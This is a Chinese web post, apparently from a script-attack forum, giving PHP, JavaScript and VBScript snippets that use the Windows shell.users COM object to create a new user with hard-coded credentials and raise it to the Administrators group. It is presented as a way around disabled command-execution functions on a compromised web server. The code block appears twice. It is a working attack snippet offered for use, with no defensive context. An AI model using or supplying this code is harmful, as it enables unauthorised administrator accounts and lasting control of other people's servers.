php版shell.users加管理员帐号的方法
40人参与 • 2011-06-15 • 脚本攻防
当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen
以及wscript.shell 组建被禁用的情况下,这也许是一个机会。
代码如下:
<?php
echo "<div align=center><b>php 版shell.users加管理员帐号</b></div>";
$username="iceskin";
$password="skin.com";
$su = new com("shell.users");
$h=$su->create($username);
$h->changepassword($password,"");
$h->setting["accounttype"] = 3;//这句很重要可以把用户加入administrators 组,
?>
对apache 搭建的web 服务器可以执行成功,iis 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。
下面是 lcx 的代码
js:
var o=new activexobject( "shell.users" );
z=o.create("test") ;
z.changepassword("123456","")
z.setting("accounttype")=3;
vbs:
set o=createobject( "shell.users" )
set z=o.create("test")
z.changepassword "123456",""
z.setting("accounttype")=3
hi.baidu.com/南拳daddy
以及wscript.shell 组建被禁用的情况下,这也许是一个机会。
代码如下:
复制代码
代码如下:<?php
echo "<div align=center><b>php 版shell.users加管理员帐号</b></div>";
$username="iceskin";
$password="skin.com";
$su = new com("shell.users");
$h=$su->create($username);
$h->changepassword($password,"");
$h->setting["accounttype"] = 3;//这句很重要可以把用户加入administrators 组,
?>
对apache 搭建的web 服务器可以执行成功,iis 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。
下面是 lcx 的代码
js:
var o=new activexobject( "shell.users" );
z=o.create("test") ;
z.changepassword("123456","")
z.setting("accounttype")=3;
vbs:
set o=createobject( "shell.users" )
set z=o.create("test")
z.changepassword "123456",""
z.setting("accounttype")=3
hi.baidu.com/南拳daddy
赞 (0)
打赏
微信扫一扫
微信扫一扫
您想发表意见!!点此发布评论
发表评论